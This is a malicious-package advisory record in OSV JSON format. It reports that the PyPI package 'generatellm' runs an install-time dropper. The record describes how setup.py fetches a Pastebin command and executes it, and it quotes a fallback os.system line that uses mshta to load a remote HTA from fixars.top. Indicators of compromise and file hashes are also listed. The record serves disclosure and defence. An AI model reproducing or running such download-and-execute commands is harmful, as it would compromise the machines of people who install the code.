{"id":"MAL-2026-5773","summary":"Malicious code in generatellm (PyPI)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (31201af7035560c0798b46e67a374b9526a7e8ed2f856235e5eb0438d1a8d080)\nGenerateLLM 2.23 is a hollow PyPI package (placeholder metadata, no functional code under src/, only an egg-info directory) whose entire payload is an install-time remote code execution dropper. setup.py at lines 31-35 fetches https://pastebin.com/raw/yBcUM1QB, takes the first line of the response, and passes it directly to os.system via `cmd /c \"{cmd_pastebin}\"`, executing arbitrary attacker-controlled commands on the installer's machine. If the Pastebin fetch fails, setup.py line 38 falls back to `os.system('cmd /c \"mshta http://fixars.top\"')`, abusing the Windows mshta.exe LOLBin to load and execute a remote HTA application from an unrelated, non-publisher, plain-HTTP domain. Both branches fire automatically during `pip install GenerateLLM` with no user interaction. The Pastebin URL is mutable and anonymous, so the executed command can be changed by the attacker at any time without republishing the package. The generic LLM-themed name with no real author identity is consistent with namespace-squatting designed to lure developers searching for LLM tooling.\n\n## Source: kam193 (081df5df4ab9a6bd2eee1934019a75c3df660cf544d1389aa16c9057eec61f66)\nDuring installation, the code attempts to download and start a malicious executable.\n\nLikely related to 2025-08-raknet-testing-package.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-easyaillm\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - obfuscation\n\n\n - malware\n","modified":"2026-06-15T23:01:01.331182615Z","published":"2026-06-14T14:37:17Z","database_specific":{"iocs":{"domains":["fixars.top"],"urls":["https://pastebin.com/raw/hEF5HaFc","https://pastebin.com/raw/yBcUM1QBs","https://pastebin.com/raw/yBcUM1QB","http://fixars.top"]},"malicious-packages-origins":[{"source":"kam193","modified_time":"2026-06-14T14:37:17.328622Z","import_time":"2026-06-14T14:50:21.178222256Z","sha256":"081df5df4ab9a6bd2eee1934019a75c3df660cf544d1389aa16c9057eec61f66","id":"pypi/2026-06-easyaillm/generatellm","versions":["2.21","2.22","2.23"]},{"source":"amazon-inspector","modified_time":"2026-06-15T19:40:00Z","import_time":"2026-06-15T20:14:27.184426128Z","sha256":"31201af7035560c0798b46e67a374b9526a7e8ed2f856235e5eb0438d1a8d080","id":"IN-MAL-2026-006681","versions":["2.23"]},{"source":"kam193","modified_time":"2026-06-14T14:37:17.328622Z","import_time":"2026-06-15T22:45:32.25959446Z","sha256":"9182c5f6ea20cab351cbba20f0849d6a4ca28e00d06158127df48be12bc8c9eb","id":"pypi/2026-06-easyaillm/generatellm","versions":["2.21","2.22","2.23"]}]},"references":[{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25"},{"type":"WEB","url":"https://bad-packages.kam193.eu/pypi/package/generatellm"},{"type":"PACKAGE","url":"https://pypi.org/project/GenerateLLM/2.23/"},{"type":"EVIDENCE","url":"https://www.virustotal.com/gui/file/926e8f1a7f349ff1eef31f89fa8ffe265c30b92e310e8bea19962d38f8c32129"}],"affected":[{"package":{"name":"generatellm","ecosystem":"PyPI","purl":"pkg:pypi/generatellm"},"versions":["2.21","2.22","2.23"],"database_specific":{"indicators":{"package_integrity":[{"filename":"generatellm-2.23.tar.gz","hashes":{"blake2b_256":"b46b460b73ad44d636594cca0eb3b11cd18be9f59484baf835fb3ff323da6c87","md5":"6633293c2b9e02284f5d7c0bf91584f4","sha256":"fd4e57599461f3335cbc48209a56ce88fb43ae5927aa37a5abfffe523123fbe3"}}],"evidence_files":[{"path":"setup.py","sha256":"5df3f1bad351c6096e716c53436b46a9bf48824a1fff9aa71677eedbbe302fe7","tlsh":"71112553dc477896b2f140441c316850fd62969b27a5c45bb87c435dffb06a18d76c9c"},{"path":"PKG-INFO","sha256":"db685cf44e31dc36be4e5cc4c5f02802b2c115ebd54e8ee1f0b12a86416f3b9b","tlsh":"4ee0df1471c5ddb27aa30a890908a2338122a24089ca6419e8ea0bebe25965943fd438"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/generatellm/MAL-2026-5773.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"Kamil Mańkowski (kam193)","contact":["https://github.com/kam193","https://bad-packages.kam193.eu/"],"type":"REPORTER"}]}